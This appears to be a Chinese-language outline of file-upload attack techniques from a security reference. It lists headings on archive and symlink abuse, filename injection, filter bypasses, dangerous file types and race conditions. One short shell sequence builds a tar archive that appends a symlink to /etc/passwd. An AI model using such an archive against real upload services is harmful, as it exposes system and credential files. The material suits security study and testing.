文件上传漏洞
滥用压缩包
滥用符号链接
滥用 tar 权限
$ mkdir parent
$ cd parent
$ tar cf a.tar . --mode=300
$ mkdir sub
$ cd sub
$ ln -s /etc/passwd file.txt
$ cd ..
$ tar -rf a.tar subZip Slip
滥用文件名
路径作为文件名
通过文件名注入
通过文件名进行 SSRF
通过大文件名进行 DoS
绕过限制
Content-Type
魔数
扩展名
无效的正则表达式
Windows 点
Windows ADS
第三方漏洞
图像处理器中的漏洞
FFmpeg
ExifTool
配置文件
潜在危险的文件
ASP
Adobe ColdFusion
Adobe ColdFusion SSRF
JSP
Perl
SVG
XML
竞态条件
文件上传竞态条件
基于 URL 的文件上传竞态条件
通过 HTTP 范围请求进行 SSRF
参考
最后更新于